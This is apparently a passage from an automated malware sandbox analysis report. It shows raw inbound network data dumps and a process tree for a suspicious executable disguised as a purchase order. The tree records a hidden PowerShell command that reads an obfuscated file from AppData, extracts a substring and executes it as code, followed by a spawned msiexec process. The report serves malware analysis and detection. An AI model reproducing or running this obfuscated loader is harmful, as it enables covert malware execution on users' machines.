                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 5f 18 b8 ae c7 c0 4c 79 6b 8f 86 e7 9b 7c d4 17 e9 3f 92 dd dd 31 6e ea c6 b9 52 58 e3 96 ff 94 8c b1 2c bc 3e d4 fc b9 3c 4b 65 50 aa 07 9e 64 5c 72 46 39 32 16 6a dd e4 7e e7 6d 61 6c 9d a0 72 30 af 47 16 43 17 35 76 cb d9 5d af 8f 29 e0 84 1d 79 0f 21 55 63 d4 7c 6e ba d0 83 76 a1 54 3f 19 64 2e a4 bf 2a 9f 14 7b 45 6b a9 3d 25 88 a1 61 b4 3f af ca 8e d1 fd 52 54 b8 23 e8 23 54 b7 9d e9 e4 39 14 a4 3a b9 dc b0 46 74 b5 89 5a 28 8d 00 7a 40 ac c8 2d 84 5f eb 73 b7 40 11 31 ee 3d df ec 58 c9 8d db e7 a3 84 8d dd e6 e8 39 bf 78 3e 3b 44 dc 26 05 22 f4 16 53 55 33 78 e5 84 43 75 18 ef a4 32 fc c2 f0 32 7b 2d 34 76 5b 43 3e 85 ae 81 bb ad f9 f1 ae b0 7d 31 c7 17 d1 27 61 bf a6 b9 37 23 66 da 69 2b 84 84 2b dd 44 a0 07 97 ee bd 13 d5 20 e0 e4 0c 90 61 1f 00
                            Data Ascii: _Lyk|?1nRX,><KePd\rF92j~malr0GC5v])y!Uc|nvT?d.*{Ek=%a?RT##T9:FtZ(z@-_s@1=X9x>;D&"SU3xCu22{-4v[C>}1'a7#fi++D a
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 46 3d 65 f4 28 44 ef 93 74 cb 2a ad 4a 80 56 84 58 60 5e dc 94 95 23 36 47 38 3d ef e3 c9 a2 f4 54 f2 53 cd 6c 58 22 38 7c c5 55 e3 db 44 1a 6b 6d 8a fd c3 b4 99 c2 96 2f 3f 7b e1 7b 99 38 56 40 9a bf 3b ba 42 c6 da 56 ba 7a 29 93 5d 54 73 c4 a8 e2 5b 54 8a a4 7b f7 b8 2c a8 ec 1c 5d b8 81 b6 15 ca 75 52 ae a1 51 f1 43 3b ee ec 4f 97 73 6f 2c 97 1f b8 5e 30 f6 a9 4c aa 1e 6e a8 82 05 52 84 05 63 28 aa fb 82 f3 12 dd b6 ce 07 79 4c ec f8 f7 0b b6 8b b9 46 72 f8 bf 5a 2c 0d 13 52 7e 2c 29 dd 1c 47 96 25 94 4c 4f 8c 5b 7f 71 4b fa bb 8d c9 22 5b 4b 6f 3e fe 8d dc 1b 72 e9 c8 df eb 22 2a 21 d1 16 ea 52 b7 9e b9 1a e5 05 05 5e f6 61 ca 2c 71 95 73 aa e4 5a 15 41 49 08 69 5c 76 6e 3a 74 d0 18 a6 72 4d 4b dc 0c e0 c5 6c 00 e3 31 ae be 6f ab bc 75 93 8d 69 ec bd
                            Data Ascii: F=e(Dt*JVX`^#6G8=TSlX"8|UDkm/?{{8V@;BVz)]Ts[T{,]uRQC;Oso,^0LnRc(yLFrZ,R~,)G%LO[qK"[Ko>r"*!R^a,qsZAIi\vn:trMKl1oui
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 64 22 54 83 84 fe 59 e8 b5 59 3e 2a fb 8d 61 90 18 a3 3b b7 fb f4 8f 8a a3 09 6d 66 32 49 a3 21 1d f8 aa 97 a3 7b e6 88 22 fb 3f 87 69 be 25 af e5 71 54 94 27 7e 04 5d c1 4c 8b 2a 06 50 6f 6d 15 f6 c9 01 b4 82 3a b4 ae 0f f6 49 9d ab 3f 9d ee 08 37 7a 17 17 ba ad 87 0b 58 5f 23 1d 46 c5 8a d5 fa 93 57 3b 49 58 ec c9 19 c2 30 86 2a a3 48 cb 90 91 3d e7 fa 13 50 56 92 88 d1 38 7a 4a 8c 36 1b d1 c0 49 fc 65 9c 10 49 08 cf 7b e5 b4 bc f8 5e 02 84 cc b8 a1 f9 80 cd a8 ac 39 3f c5 09 45 c9 57 d6 3c 30 72 88 2c 3f 6c 06 a6 85 12 38 8e e8 71 f8 9a c6 83 f3 97 bf 4f 57 e9 36 59 a7 ff 81 87 3f 5c a8 ce 9b 9e e1 59 07 80 9a f5 b8 ed a4 30 a1 52 c7 3a 93 e9 98 2e 65 f5 48 cb 74 47 63 1d c6 89 6f 5a 48 f8 f1 95 ab 51 ac 65 e3 02 c0 fa 45 26 da 37 66 88 5c 27 23 20 60
                            Data Ascii: d"TYY>*a;mf2I!{"?i%qT'~]L*Pom:I?7zX_#FW;IX0*H=PV8zJ6IeI{^9?EW<0r,?l8qOW6Y?\Y0R:.eHtGcoZHQeE&7f\'# `
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 66 32 1a 50 47 70 3a 40 fa dc 35 cf 69 63 30 8b 24 0e 4b c7 8f c5 15 9f 02 5a 7b 7c c9 3c 6a 72 70 b4 1e f1 08 9e e2 b3 f3 43 11 dc dc cf fc 08 20 9b 97 a9 bc 3b de 50 08 f5 36 08 f3 4c f8 8a 3b 7b 45 3f 09 24 4c f4 e3 c9 7f dc 6d 2e 58 b3 60 f7 dd 83 6f 29 64 ab b6 7d 01 a8 13 e7 66 59 be fb c7 4c 82 cd 13 73 10 d4 e0 f6 d1 bb 20 65 9f 25 36 57 c7 30 a9 10 05 83 16 03 50 e9 2c 60 00 2e f4 8b 7e 06 5f b9 a5 7c 4c 4f 8a 81 f8 67 ca 3e 01 44 31 41 ee 36 0c d6 14 fe 21 3b 07 2a 48 26 55 66 66 00 f4 3c c4 a6 b1 0b 6c e6 bb 49 50 01 16 08 35 3e ad 78 bc 65 62 de dd d9 2a 03 57 d8 c1 3d 2e a2 7e 26 32 09 62 4e be 87 15 c4 c9 64 6c 34 d7 ce b9 40 be 51 a9 eb ee b1 e1 f7 82 84 e9 57 f4 2a 19 78 08 55 6f 30 0c f6 5e 86 d2 95 f6 0f 04 51 d4 1e cf 8c 7e 54 a2 79 a0
                            Data Ascii: f2PGp:@5ic0$KZ{|<jrpC ;P6L;{E?$Lm.X`o)d}fYLs e%6W0P,`.~_|LOg>D1A6!;*H&Uff<lIP5>xeb*W=.~&2bNdl4@QW*xUo0^Q~Ty


                            Target ID:0
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Users\user\Desktop\PO0317011.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\PO0317011.exe"
                            Imagebase:0x400000
                            File size:734'784 bytes
                            MD5 hash:AC30B21EA0E4758774EEC541EF3445E3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
                            Imagebase:0x9d0000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff62fc20000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:06:59:15
                            Start date:14/03/2025
                            Path:C:\Windows\SysWOW64\msiexec.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                            Imagebase:0x9a0000
                            File size:59'904 bytes
                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
